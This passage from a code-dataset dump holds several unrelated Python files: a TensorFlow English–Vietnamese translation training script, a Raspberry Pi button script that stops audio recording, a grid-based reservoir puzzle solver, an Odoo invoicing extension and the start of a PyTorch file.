file\r\nwith open(word2int_english_path, 'wb') as f:\r\n pickle.dump(word2int_english, f)\r\n\r\nwith open(int2word_english_path, 'wb') as f:\r\n pickle.dump(int2word_english, f)\r\n\r\n\r\n# Create word2int and int2word dictionary\r\nword_counter = collections.Counter(words_vietnamese).most_common()\r\n\r\nword2int_vietnamese = dict()\r\nword2int_vietnamese[\"\"] = 0\r\nword2int_vietnamese[\"\"] = 1\r\nword2int_vietnamese[\"\"] = 2\r\nword2int_vietnamese[\"\"] = 3\r\nfor word, _ in word_counter:\r\n word2int_vietnamese[word] = len(word2int_vietnamese)\r\n\r\nint2word_vietnamese = dict(\r\n zip(word2int_vietnamese.values(), word2int_vietnamese.keys()))\r\n\r\n# Save word2int and int2word into pickle file\r\nwith open(word2int_vietnamese_path, 'wb') as f:\r\n pickle.dump(word2int_vietnamese, f)\r\n\r\nwith open(int2word_vietnamese_path, 'wb') as f:\r\n pickle.dump(int2word_vietnamese, f)\r\n\r\n\r\n# Convert input data from text to int\r\ndef get_intSeq_english(data_list, max_length, padding=False):\r\n seq_list = list()\r\n for sent in data_list:\r\n # Get tokens in each sent\r\n words = word_tokenize(sent)\r\n\r\n # Use this for train_english\r\n if(padding):\r\n # Make all sent to have the same length as max_length\r\n if(len(words) < max_length):\r\n words = words + (max_length-len(words))*[\"\"]\r\n else:\r\n words = words[:max_length]\r\n\r\n # Use this for train_vietnamese\r\n else:\r\n words = words[:(max_length-1)]\r\n\r\n # Convert word to its corresponding int value\r\n # If the word doesnt exist, use the value of \"\" by default\r\n int_seq = [word2int_english.get(\r\n word, word2int_english[\"\"]) for word in words]\r\n\r\n # Add int_seq to seq_list\r\n seq_list.append(int_seq)\r\n\r\n return seq_list\r\n\r\n# Convert input data from text to int\r\n\r\n\r\ndef get_intSeq_vietnamese(data_list, max_length, padding=False):\r\n seq_list = list()\r\n for sent in data_list:\r\n # Get tokens in each sent\r\n words = word_tokenize(sent)\r\n\r\n # Use this for train_english\r\n if(padding):\r\n # Make all sent to have the same length as max_length\r\n if(len(words) < max_length):\r\n words = words + (max_length-len(words))*[\"\"]\r\n else:\r\n words = words[:max_length]\r\n\r\n # Use this for train_vietnamese\r\n else:\r\n words = words[:(max_length-1)]\r\n\r\n # Convert word to its corresponding int value\r\n # If the word doesnt exist, use the value of \"\" by default\r\n int_seq = [word2int_vietnamese.get(\r\n word, word2int_vietnamese[\"\"]) for word in words]\r\n\r\n # Add int_seq to seq_list\r\n seq_list.append(int_seq)\r\n\r\n return seq_list\r\n\r\n\r\n# Define the max length of english and vietnamese\r\nenglish_max_len = 50\r\nvietnamese_max_len = 50\r\n\r\n# Get the sequence of int value\r\ntrain_english_intSeq = get_intSeq_english(\r\n train_english, english_max_len, padding=True)\r\ntrain_vietnamese_intSeq = get_intSeq_vietnamese(\r\n train_vietnamese, vietnamese_max_len)\r\n\r\n\r\n# load model\r\nword_embed_english_w2v = KeyedVectors.load_word2vec_format(\r\n args[\"word_emb_src\"], binary=True, unicode_errors='ignore')\r\n# Sort the int2word\r\nint2word_sorted = sorted(int2word_english.items())\r\n\r\n# Get the list of word embedding corresponding to int value in ascending order\r\nword_emb_list = list()\r\nembedding_size = len(word_embed_english_w2v['the'])\r\nfor int_val, word in int2word_sorted:\r\n # Add Glove embedding if it exists\r\n if(word in word_embed_english_w2v):\r\n word_emb_list.append(word_embed_english_w2v[word])\r\n\r\n # Otherwise, the value of word embedding is 0\r\n else:\r\n word_emb_list.append(np.zeros([embedding_size], dtype=np.float32))\r\n\r\n# Assign random vector to , token\r\nword_emb_list[2] = np.random.normal(0, 1, embedding_size)\r\nword_emb_list[3] = np.random.normal(0, 1, embedding_size)\r\n\r\n# the final word embedding\r\nword_embed_english = np.array(word_emb_list)\r\n\r\n\r\n# load model\r\nword_embed_vietnamese_w2v = KeyedVectors.load_word2vec_format(\r\n args[\"word_emb_targ\"], binary=True, unicode_errors='ignore')\r\n\r\n# Sort the int2word\r\nint2word_sorted = sorted(int2word_vietnamese.items())\r\n\r\n# Get the list of word embedding corresponding to int value in ascending order\r\nword_emb_list = list()\r\nembedding_size = len(word_embed_vietnamese_w2v['the'])\r\nfor int_val, word in int2word_sorted:\r\n # Add Glove embedding if it exists\r\n if(word in word_embed_vietnamese_w2v):\r\n word_emb_list.append(word_embed_vietnamese_w2v[word])\r\n\r\n # Otherwise, the value of word embedding is 0\r\n else:\r\n word_emb_list.append(np.zeros([embedding_size], dtype=np.float32))\r\n\r\n# Assign random vector to , token\r\nword_emb_list[2] = np.random.normal(0, 1, embedding_size)\r\nword_emb_list[3] = np.random.normal(0, 1, embedding_size)\r\n\r\n# the final word embedding\r\nword_embed_vietnamese = np.array(word_emb_list)\r\n\r\n\r\ndef get_batches(input_data, output_data, batch_size):\r\n # Convert input and output data from list to numpy array\r\n input_data = np.array(input_data)\r\n output_data = np.array(output_data)\r\n\r\n # Number of batches per epoch\r\n num_batches_epoch = math.ceil(len(input_data)/batch_size)\r\n for batch_num in range(num_batches_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, len(input_data))\r\n yield input_data[start_index:end_index], output_data[start_index:end_index]\r\n\r\n\r\n#CNN + GLU\r\ndef position_encoding(sentence_size, embedding_size):\r\n encoding = np.ones((sentence_size, embedding_size), dtype=np.float32)\r\n ls = sentence_size + 1\r\n le = embedding_size + 1\r\n for k in range(1, le):\r\n for j in range(1, ls):\r\n encoding[j-1, k-1] = (1.0 - j/float(ls)) - (\r\n k / float(le)) * (1. - 2. * j/float(ls))\r\n\r\n return encoding\r\n\r\n\r\ndef _create_position_embedding(embedding_dim, num_positions, lengths, maxlen):\r\n # Create constant position encodings\r\n position_encodings = tf.constant(position_encoding(num_positions, embedding_dim))\r\n\r\n # Slice to size of current sequence\r\n pe_slice = position_encodings[:maxlen, :]\r\n # Replicate encodings for each element in the batch\r\n batch_size = tf.shape(lengths)[0]\r\n pe_batch = tf.tile([pe_slice], [batch_size, 1, 1])\r\n\r\n # Mask out positions that are padded\r\n positions_mask = tf.sequence_mask(\r\n lengths=lengths, maxlen=maxlen, dtype=tf.float32)\r\n positions_embed = pe_batch * tf.expand_dims(positions_mask, 2)\r\n\r\n return positions_embed\r\n\r\n\r\n# CNN layer\r\ndef conv1d_weightnorm(inputs, layer_idx, out_dim, kernel_size, padding=\"SAME\", dropout=1.0, var_scope_name=\"conv_layer\"): #padding should take attention\r\n with tf.variable_scope(\"conv_layer_\"+str(layer_idx)):\r\n in_dim = int(inputs.get_shape()[-1])\r\n V = tf.get_variable('V', shape=[kernel_size, in_dim, out_dim], dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0, stddev=tf.sqrt(4.0*dropout/(kernel_size*in_dim))), trainable=True)\r\n V_norm = tf.norm(V.initialized_value(), axis=[0,1]) # V shape is M*N*k, V_norm shape is k \r\n g = tf.get_variable('g', dtype=tf.float32, initializer=V_norm, trainable=True)\r\n b = tf.get_variable('b', shape=[out_dim], dtype=tf.float32, initializer=tf.zeros_initializer(), trainable=True)\r\n \r\n # use weight normalization (Salimans & Kingma, 2016)\r\n W = tf.reshape(g, [1,1,out_dim])*tf.nn.l2_normalize(V,[0,1])\r\n inputs = tf.nn.bias_add(tf.nn.conv1d(value=inputs, filters=W, stride=1, padding=padding), b) \r\n return inputs\r\n\r\n# tang kich thuoc layer truoc khi vao cnn dam bao shape ko thay doi, so luong du lieu van duoc giu lai\r\ndef linear_mapping_weightnorm(inputs, out_dim, in_dim=None, dropout=1.0, var_scope_name=\"linear_mapping\"):\r\n with tf.variable_scope(var_scope_name):\r\n input_shape = inputs.get_shape().as_list() # static shape. may has None\r\n input_shape_tensor = tf.shape(inputs) \r\n # use weight normalization (Salimans & Kingma, 2016) w = g* v/2-norm(v)\r\n V = tf.get_variable('V', shape=[int(input_shape[-1]), out_dim], dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0, stddev=tf.sqrt(dropout*1.0/int(input_shape[-1]))), trainable=True)\r\n V_norm = tf.norm(V.initialized_value(), axis=0) # V shape is M*N, V_norm shape is N\r\n g = tf.get_variable('g', dtype=tf.float32, initializer=V_norm, trainable=True)\r\n b = tf.get_variable('b', shape=[out_dim], dtype=tf.float32, initializer=tf.zeros_initializer(), trainable=True) # weightnorm bias is init zero\r\n \r\n assert len(input_shape) == 3\r\n inputs = tf.reshape(inputs, [-1, input_shape[-1]])\r\n inputs = tf.matmul(inputs, V)\r\n inputs = tf.reshape(inputs, [input_shape_tensor[0], -1, out_dim])\r\n #inputs = tf.matmul(inputs, V) # x*v\r\n \r\n scaler = tf.div(g, tf.norm(V, axis=0)) # g/2-norm(v)\r\n inputs = tf.reshape(scaler,[1, out_dim])*inputs + tf.reshape(b,[1, out_dim]) # x*v g/2-norm(v) + b\r\n \r\n\r\n return inputs \r\n\r\ndef position_encoding(inputs):\r\n T = tf.shape(inputs)[1]\r\n repr_dim = inputs.get_shape()[-1].value\r\n pos = tf.reshape(tf.range(0.0, tf.to_float(T), dtype=tf.float32), [-1, 1])\r\n i = np.arange(0, repr_dim, 2, np.float32)\r\n denom = np.reshape(np.power(10000.0, i / repr_dim), [1, -1])\r\n enc = tf.expand_dims(tf.concat([tf.sin(pos / denom), tf.cos(pos / denom)], 1), 0)\r\n return tf.tile(enc, [tf.shape(inputs)[0], 1, 1])\r\n\r\ndef layer_norm(inputs, epsilon=1e-8):\r\n mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)\r\n normalized = (inputs - mean) / (tf.sqrt(variance + epsilon))\r\n params_shape = inputs.get_shape()[-1:]\r\n gamma = tf.get_variable('gamma', params_shape, tf.float32, tf.ones_initializer())\r\n beta = tf.get_variable('beta', params_shape, tf.float32, tf.zeros_initializer())\r\n return gamma * normalized + beta\r\n\r\n\r\ndef cnn_block(x, dilation_rate, pad_sz, hidden_dim, kernel_size):\r\n x = layer_norm(x)\r\n pad = tf.zeros([tf.shape(x)[0], pad_sz, hidden_dim])\r\n x = tf.layers.conv1d(inputs = tf.concat([pad, x, pad], 1),\r\n filters = hidden_dim,\r\n kernel_size = kernel_size,\r\n dilation_rate = dilation_rate)\r\n x = x[:, :-pad_sz, :]\r\n x = tf.nn.relu(x)\r\n return x\r\n# GLU \r\ndef gated_linear_units(inputs):\r\n input_shape = inputs.get_shape().as_list()\r\n assert len(input_shape) == 3\r\n input_pass = inputs[:,:,0:int(input_shape[2]/2)]\r\n input_gate = inputs[:,:,int(input_shape[2]/2):]\r\n input_gate = tf.sigmoid(input_gate)\r\n return tf.multiply(input_pass, input_gate)\r\n\r\n# Model for Machine Translation\r\nclass Seq2SeqModel(object):\r\n def __init__(self,vocab_size_en, vocab_size_vi, word_embedding_en, word_embedding_vi, input_len, output_len, params, train=True):\r\n # Get the vocab size\r\n self.vocab_size_en=vocab_size_en\r\n self.vocab_size_vi=vocab_size_vi \r\n \r\n # Get hyper-parameters from params \r\n self.num_layers=params['num_layers']\r\n self.num_hiddens=params['num_hiddens'] \r\n self.learning_rate = params['learning_rate']\r\n self.keep_prob = params['keep_prob']\r\n self.beam_width = params['beam_width']\r\n \r\n self.kernel_size = params['kernel_size']\r\n # Using BasicLSTMCell as a cell unit\r\n self.cell=tf.nn.rnn_cell.LSTMCell \r\n \r\n # Define Place holders for the model\r\n self.batch_size=tf.placeholder(tf.int32,(),name=\"batch_size\")\r\n self.global_step = tf.Variable(0, trainable=False) # False means not adding the variable to the graph collection \r\n \r\n # place holders for encoder\r\n self.inputSeq=tf.placeholder(tf.int32,[None,input_len])\r\n self.inputSeq_len=tf.placeholder(tf.int32, [None]) # Need to define the Shape as required in tf.contrib.seq2seq.tile_batch\r\n \r\n # place holders for decoder\r\n self.decoder_input=tf.placeholder(tf.int32,[None,output_len])\r\n self.decoder_len=tf.placeholder(tf.int32, [None])\r\n self.decoder_target=tf.placeholder(tf.int32,[None,output_len])\r\n \r\n # Define projection_layer\r\n self.projection_layer = tf.layers.Dense(self.vocab_size_vi, use_bias=False)\r\n \r\n # Define the Embedding layer\r\n with tf.name_scope(\"embedding\"):\r\n self.embeddings_en=tf.get_variable(\"embeddings_en\",initializer=tf.constant(word_embedding_en,dtype=tf.float32))\r\n self.embeddings_vi=tf.get_variable(\"embeddings_vi\",initializer=tf.constant(word_embedding_vi,dtype=tf.float32))\r\n \r\n # map the int value with its embeddings\r\n input_emb=tf.nn.embedding_lookup(self.embeddings_en,self.inputSeq)\r\n decoder_input_emb=tf.nn.embedding_lookup(self.embeddings_vi,self.decoder_input)\r\n\r\n \r\n #layer = 0\r\n input_emb += position_encoding(input_emb)\r\n for i in range(self.num_layers): \r\n next_layer = input_emb\r\n dilation_rate = 2 ** i\r\n pad_sz = (self.kernel_size - 1) * dilation_rate \r\n with tf.variable_scope('block_%d'%i,reuse=tf.AUTO_REUSE):\r\n #input_emb += cnn_block(input_emb, dilation_rate, \r\n # pad_sz, 100, self.kernel_size)\r\n #layer += gated_linear_units(input_emb)\r\n next_layer = conv1d_weightnorm(inputs=next_layer, layer_idx=i, out_dim=100*2, kernel_size=self.kernel_size, padding=\"SAME\", dropout=0.9, var_scope_name=\"conv_layer_\"+str(i))\r\n next_layer = gated_linear_units(next_layer)\r\n input_emb = (next_layer + input_emb) * tf.sqrt(0.5)\r\n #input_emb = gated_linear_units(input_emb)\r\n\r\n #input_emb = layer\r\n #print(\"emb: \",input_emb) \r\n '''\r\n print(\"emb1: \", input_emb)\r\n #CNN encoder\r\n input_emb += position_encoding(input_emb)\r\n \r\n for i in range(self.num_layers): \r\n next_layer = input_emb\r\n dilation_rate = 2 ** i\r\n pad_sz = (self.kernel_size - 1) * dilation_rate \r\n with tf.variable_scope('block',reuse=tf.AUTO_REUSE):\r\n next_layer = conv1d_weightnorm(inputs=next_layer, layer_idx=i, out_dim=100*2, kernel_size=self.kernel_size, padding=\"SAME\", dropout=0.9, var_scope_name=\"conv_layer_\"+str(i))\r\n next_layer = gated_linear_units(next_layer)\r\n input_emb = (next_layer + input_emb) * tf.sqrt(0.5)\r\n\r\n print(\"ebm2: \", input_emb)\r\n '''\r\n\r\n\r\n\r\n # Convert from batch_size*seq_len*embedding to seq_len*batch_size*embedding to feed data with timestep \r\n # But, we need to set time_major=True during Training\r\n self.encoder_inputEmb = tf.transpose(input_emb, perm=[1, 0, 2])\r\n self.decoder_inputEmb = tf.transpose(decoder_input_emb, perm=[1, 0, 2])\r\n\r\n \r\n \r\n # Define the Encoder\r\n with tf.name_scope(\"encoder\"): \r\n # Create RNN Cell for forward and backward direction\r\n fw_cells=list()\r\n bw_cells=list()\r\n for i in range(self.num_layers):\r\n fw_cell= self.cell(self.num_hiddens)\r\n bw_cell= self.cell(self.num_hiddens)\r\n \r\n # Add Dropout\r\n fw_cell=rnn.DropoutWrapper(fw_cell,output_keep_prob=self.keep_prob)\r\n bw_cell=rnn.DropoutWrapper(bw_cell,output_keep_prob=self.keep_prob)\r\n \r\n # Add cell to the list\r\n fw_cells.append(fw_cell)\r\n bw_cells.append(bw_cell)\r\n \r\n \r\n # Build a multi bi-directional model from fw_cells and bw_cells\r\n outputs, encoder_state_fw, encoder_state_bw = tf.contrib.rnn.stack_bidirectional_dynamic_rnn(\r\n cells_fw=fw_cells, cells_bw=bw_cells,inputs=self.encoder_inputEmb,time_major=True, sequence_length=self.inputSeq_len, dtype=tf.float32)\r\n \r\n # The ouput of Encoder (time major)\r\n self.encoder_outputs=outputs\r\n \r\n # Use the final state of the last layer as encoder_final_state \r\n encoder_state_c = tf.concat((encoder_state_fw[-1].c, encoder_state_bw[-1].c), 1)\r\n encoder_state_h = tf.concat((encoder_state_fw[-1].h, encoder_state_bw[-1].h), 1)\r\n self.encoder_final_state = rnn.LSTMStateTuple(c=encoder_state_c, h=encoder_state_h)\r\n \r\n # Define the Decoder for training\r\n with tf.name_scope(\"decoder\"):\r\n # Define Decoder cell\r\n decoder_num_hiddens =self.num_hiddens * 2 # As we use bi-directional RNN\r\n decoder_cell=self.cell(decoder_num_hiddens)\r\n \r\n # Training mode \r\n if(train):\r\n # Convert from time major to batch major \r\n attention_states = tf.transpose(self.encoder_outputs, [1, 0, 2])\r\n \r\n # Decoder with attention \r\n attention=tf.contrib.seq2seq.BahdanauAttention(num_units=decoder_num_hiddens, memory=attention_states, memory_sequence_length=self.inputSeq_len,normalize=True)\r\n attention_decoder_cell= tf.contrib.seq2seq.AttentionWrapper(cell=decoder_cell,attention_mechanism=attention,attention_layer_size=decoder_num_hiddens)\r\n\r\n # Use the final state of encoder as the initial state of the decoder\r\n decoder_initial_state = attention_decoder_cell.zero_state(dtype=tf.float32, batch_size=self.batch_size)\r\n decoder_initial_state = decoder_initial_state.clone(cell_state=self.encoder_final_state )\r\n\r\n # Use TrainingHelper to train the Model \r\n training_helper = tf.contrib.seq2seq.TrainingHelper(inputs=self.decoder_inputEmb,sequence_length=self.decoder_len, time_major=True)\r\n decoder = tf.contrib.seq2seq.BasicDecoder(cell=attention_decoder_cell,helper=training_helper,initial_state=decoder_initial_state,output_layer=self.projection_layer)\r\n logits, _, _ = tf.contrib.seq2seq.dynamic_decode(decoder, output_time_major=True,maximum_iterations=output_len)\r\n \r\n \r\n # Convert from time major to batch major \r\n self.training_logits = tf.transpose(logits.rnn_output, perm=[1, 0, 2])\r\n \r\n # Adding zero to make sure training_logits has shape: [batch_size, sequence_length, num_decoder_symbols]\r\n self.training_logits = tf.concat([self.training_logits, tf.zeros([self.batch_size, output_len - tf.shape(self.training_logits)[1], self.vocab_size_vi])], axis=1)\r\n \r\n # Inference mode \r\n else:\r\n # Using Beam search\r\n tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(tf.transpose(self.encoder_outputs, perm=[1, 0, 2]), multiplier=self.beam_width)\r\n tiled_encoder_final_state=tf.contrib.seq2seq.tile_batch(self.encoder_final_state, multiplier=self.beam_width)\r\n tiled_inputSeq_len=tf.contrib.seq2seq.tile_batch(self.inputSeq_len, multiplier=self.beam_width)\r\n\r\n # Decoder with attention with Beam search\r\n attention=tf.contrib.seq2seq.BahdanauAttention(num_units=decoder_num_hiddens, memory=tiled_encoder_outputs, memory_sequence_length=tiled_inputSeq_len,normalize=True)\r\n attention_decoder_cell= tf.contrib.seq2seq.AttentionWrapper(cell=decoder_cell,attention_mechanism=attention,attention_layer_size=decoder_num_hiddens)\r\n\r\n # Use the final state of encoder as the initial state of the decoder\r\n decoder_initial_state = attention_decoder_cell.zero_state(dtype=tf.float32, batch_size=self.batch_size * self.beam_width)\r\n decoder_initial_state = decoder_initial_state.clone(cell_state=tiled_encoder_final_state)\r\n\r\n # Build a Decoder with Beam Search\r\n beamSearch_decoder=tf.contrib.seq2seq.BeamSearchDecoder( \r\n cell=attention_decoder_cell,\r\n embedding=self.embeddings_vi,\r\n start_tokens=tf.fill([self.batch_size],tf.constant(2)),\r\n end_token=tf.constant(3),\r\n initial_state=decoder_initial_state,\r\n beam_width=self.beam_width,\r\n output_layer=self.projection_layer \r\n )\r\n\r\n # Perform dynamic decoding with beamSearch_decoder\r\n outputs, _ , _ =tf.contrib.seq2seq.dynamic_decode(decoder=beamSearch_decoder,maximum_iterations= output_len,output_time_major=True)\r\n \r\n # Convert from seq_len*batch_size*beam_width to batch_size*beam_width*seq_len\r\n outputs=tf.transpose(outputs.predicted_ids, perm=[1, 2, 0])\r\n \r\n # Take the first beam (best result) as Decoder ouput \r\n #self.decoder_outputs=outputs[:,0,:]\r\n self.decoder_outputs = outputs\r\n\r\n with tf.name_scope(\"optimization\"):\r\n # Used for Training mode only \r\n if(train):\r\n # Caculate loss value \r\n masks = tf.sequence_mask(lengths=self.decoder_len,maxlen=output_len, dtype=tf.float32) \r\n self.loss = tf.contrib.seq2seq.sequence_loss(logits=self.training_logits,targets=self.decoder_target,weights=masks)\r\n\r\n # Using AdamOptimizer\r\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\r\n # Compute gradient \r\n gradients = optimizer.compute_gradients(self.loss)\r\n # Apply Gradient Clipping \r\n gradients_clipping = [(tf.clip_by_value(grad, clip_value_min=-1., clip_value_max=1.), var) for grad, var in gradients if grad is not None]\r\n\r\n # Apply gradients to variables\r\n self.train_update = optimizer.apply_gradients(gradients_clipping, global_step=self.global_step)\r\n #self.train_update = optimizer.apply_gradients(gradients, global_step=self.global_step)\r\n\r\n\r\n# Define hyper-parameters for the Model\r\nparams = dict()\r\nparams['num_layers'] = int(args[\"num_layers\"])\r\nparams['num_hiddens'] = int(args[\"num_hiddens\"])\r\nparams['learning_rate'] = float(args[\"learning_rate\"])\r\nparams['keep_prob'] = float(args[\"keep_prob\"])\r\nparams['beam_width'] = int(args[\"beam_width\"])\r\nparams['kernel_size'] = 3\r\nnum_epochs = 10\r\nearly_stop = 5 # Stop if there is no improvement after 5 epochese\r\nBATCH_SIZE = int(args[\"batch_size\"])\r\n\r\n# Set paths to save the model\r\ncheckpoint = args[\"checkpoint\"]\r\n\r\nstart_time = time.time()\r\n\r\ntf.reset_default_graph()\r\n\r\nwith tf.Session() as sess:\r\n # Create a Seq2seq model\r\n model = Seq2SeqModel(len(int2word_english), len(int2word_vietnamese), word_embed_english,\r\n word_embed_vietnamese, english_max_len, vietnamese_max_len, params)\r\n\r\n # Initialize all variables\r\n sess.run(tf.global_variables_initializer())\r\n min_loss = 1000 # To find the minimum loss during training\r\n no_impove_count = 0 # Count the number of consecutive epoch having no improvement\r\n\r\n # load checkpoint\r\n #saver = tf.train.Saver(tf.global_variables())\r\n #saver.restore(sess, checkpoint)\r\n\r\n for epoch in range(num_epochs):\r\n # Get batches from training data\r\n batches = get_batches(train_english_intSeq,\r\n train_vietnamese_intSeq, batch_size=BATCH_SIZE)\r\n\r\n # Reset epoch_loss after each epoch\r\n epoch_loss = 0\r\n # Interate over batches\r\n for batch_i, (batch_x, batch_y) in enumerate(batches):\r\n # The actual length of each sequence in the batch (excluding \"\")\r\n batch_x_len = list(\r\n map(lambda seq: len([word_int for word_int in seq if word_int != 0]), batch_x))\r\n\r\n # Decoder input is created by adding to the begining of each output sentence\r\n batch_decoder_input = list(\r\n map(lambda seq: [word2int_vietnamese[\"\"]] + list(seq), batch_y))\r\n\r\n # The actual length of each Decoder input (excluding \"\")\r\n batch_decoder_len = list(map(lambda seq: len(\r\n [word_int for word_int in seq if word_int != 0]), batch_decoder_input))\r\n\r\n # The actual ouput of Decoder is created by adding to the begining of each output sentence\r\n batch_decoder_output = list(map(lambda seq: list(\r\n seq) + [word2int_vietnamese[\"\"]], batch_y))\r\n\r\n # Add to make all input and ouput of Decoder have same length\r\n batch_decoder_input = list(\r\n map(lambda seq: seq + (vietnamese_max_len - len(seq)) * [word2int_vietnamese[\"\"]], batch_decoder_input))\r\n batch_decoder_output = list(\r\n map(lambda seq: seq + (vietnamese_max_len - len(seq)) * [word2int_vietnamese[\"\"]], batch_decoder_output))\r\n\r\n # Create a train_feed_dict\r\n train_feed_dict = {\r\n model.batch_size: len(batch_x),\r\n model.inputSeq: batch_x,\r\n model.inputSeq_len: batch_x_len,\r\n\r\n model.decoder_input: batch_decoder_input,\r\n model.decoder_len: batch_decoder_len,\r\n model.decoder_target: batch_decoder_output\r\n }\r\n\r\n # Start training the model\r\n _, step, loss, encoder_outputs = sess.run(\r\n [model.train_update, model.global_step, model.loss, model.encoder_outputs], feed_dict=train_feed_dict)\r\n epoch_loss += loss\r\n\r\n # Display loss value of each step\r\n print(\"step {0}: loss = {1}\".format(step, loss))\r\n\r\n print(\"Finish epoch\", epoch+1)\r\n # Averaging the epoch_loss\r\n epoch_loss = epoch_loss/(batch_i+1)\r\n\r\n # Save the model if the epoch_loss is at a new minimum,\r\n if epoch_loss <= min_loss:\r\n # Set new minimum loss\r\n min_loss = epoch_loss\r\n # Reset the no_impove_count\r\n no_impove_count = 0\r\n\r\n # Save the new model\r\n saver = tf.train.Saver(tf.global_variables())\r\n saver.save(sess, checkpoint)\r\n\r\n print('New model saved, minimum loss:', min_loss, '\\n')\r\n\r\n # Early stopping\r\n else:\r\n print(\"No Improvement!\", '\\n')\r\n no_impove_count += 1\r\n if(no_impove_count == early_stop):\r\n print(\"Early stopping... Finish training\")\r\n break\r\n\r\nend_time = time.time()\r\ntraining_time = (end_time-start_time)/60\r\nprint(\"\\nTraining time (mins): \", training_time)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":30471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"193351192","text":"import os\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setwarnings(True)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\ndef end_script(pin):\n print(\"stopping script\")\n os.system('killall arecord')\n os.system('killall aplay')\n\nGPIO.add_event_detect(13, GPIO.RISING, callback=end_script, bouncetime=10)\n\ntry:\n while True:\n time.sleep(50000)\nexcept KeyboardInterrupt:\n print('Goodbye')\n\nGPIO.remove_event_detect(13)\n","sub_path":"record/killer.py","file_name":"killer.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"75186695","text":"import re\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntestinput = \"\"\"\\\nx=495, y=2..7\ny=7, x=495..501\nx=501, y=3..7\nx=498, y=2..4\nx=506, y=1..2\nx=498, y=10..13\nx=504, y=10..13\ny=13, x=498..504\\\n\"\"\"\n\ndef plotme():\n global grid\n\n plt.spy(grid.T)\n plt.show()\n # plt.gca().invert_yaxis()\n\n# air . : 0\n# flowing water | : 1\n# standing water ~ : 2\n# clay # : 3\n\nAIR = 0\nWATERF = 1\nWATERS = 2\nCLAY = 3\n\nrex = re.compile(r\"x=[0-9.]*\")\nrey = re.compile(r\"y=[0-9.]*\")\n\nspring_location = (500, 0) # at top of area\n\nclay_x = []\nclay_y = []\nfor line in testinput.splitlines():\n print(line)\n xinput = re.findall(rex, line)[0]\n yinput = re.findall(rey, line)[0]\n # .. either in x or y, never both or neither\n if \"..\" in xinput:\n xinput = xinput.split(\"..\")\n x = list(range(int(xinput[0][2:]), int(xinput[1])+1))\n y = [int(yinput[2:])] * len(x)\n else:\n yinput = yinput.split(\"..\")\n y = list(range(int(yinput[0][2:]), int(yinput[1])+1))\n x = [int(xinput[2:])] * len(y)\n clay_x.extend(x)\n clay_y.extend(y)\n\nmin_x = min(clay_x)\nmax_x = max(clay_x)\nmin_y = min(clay_y)\nmax_y = max(clay_y)\n\ngrid = np.zeros([max_x-min_x+3, max_y + 1],dtype=int)\n\nassert len(clay_x) == len(clay_y)\nfor n in range(len(clay_x)):\n grid[clay_x[n]-min_x+1, clay_y[n]] = 3\nprint(clay_x)\nprint(grid)\n\ngrid[spring_location[0]-min_x+1, spring_location[1]] = 1\n\nwhile True:\n old_grid = grid.copy()\n\n for x in range(grid.shape[0]):\n for y in range(grid.shape[1]):\n if grid[x,y] == WATERF:\n if y+1 < grid.shape[1]:\n grid[x,y+1] = WATERF\n if grid[x,y+1] == CLAY:\n grid[x,y] = WATERS\n\n print(\"---\")\n print(grid.T)\n if np.all(old_grid == grid):\n break\n \n","sub_path":"day17_reservoirresearchp.py","file_name":"day17_reservoirresearchp.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206633613","text":"from odoo import models, api\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_is_zero\nclass SaleOrderLine(models.Model):\n _inherit = 'stock.move'\n \n @api.multi\n def _prepare_invoice_line(self, invoices, qty, position):\n\n self.ensure_one()\n res = {}\n account = self.product_id.property_account_income_id or self.product_id.categ_id.property_account_income_categ_id\n if not account:\n raise UserError(_('Please define income account for this product: \"%s\" (id:%d) - or for its category: \"%s\".') % \n (self.product_id.name, self.product_id.id, self.product_id.categ_id.name))\n sale_line_id = self.procurement_id.sale_line_id\n fpos = sale_line_id.order_id.fiscal_position_id or sale_line_id.order_id.partner_id.property_account_position_id\n if fpos:\n account = fpos.map_account(account)\n \n res = {\n 'name': sale_line_id.name,\n 'origin': sale_line_id.order_id.client_order_ref, # sale_line_id.order_id.name\n 'account_id': account.id,\n 'price_unit': sale_line_id.price_unit,\n 'quantity': qty,\n 'move_id':self.id,\n 'position':position,\n 'discount': sale_line_id.discount,\n 'uom_id': sale_line_id.product_uom.id,\n 'product_id': self.product_id.id or False,\n 'layout_category_id': sale_line_id.layout_category_id and sale_line_id.layout_category_id.id or False,\n 'invoice_line_tax_ids': [(6, 0, sale_line_id.tax_id.ids)],\n 'account_analytic_id': sale_line_id.order_id.project_id.id,\n 'analytic_tag_ids': [(6, 0, sale_line_id.analytic_tag_ids.ids)],\n }\n return res\n\n \n @api.multi\n def invoice_line_create(self, invoice_id, qty, position, sequence):\n \"\"\"\n Create an invoice line. The quantity to invoice can be positive (invoice) or negative\n (refund).\n\n :param invoice_id: integer\n :param qty: float quantity to invoice\n \"\"\"\n self.ensure_one()\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n invoice_line_id = False\n if not float_is_zero(qty, precision_digits=precision):\n vals = self._prepare_invoice_line(invoice_id, qty, position)\n vals.update({'invoice_id': invoice_id, 'sequence': sequence, 'sale_line_ids': [(6, 0, [self.procurement_id.sale_line_id.id])]})\n invoice_line_id = self.env['account.invoice.line'].create(vals)\n \n return invoice_line_id\n \n","sub_path":"invoice_based_on_delivery_ept/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174267914","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom 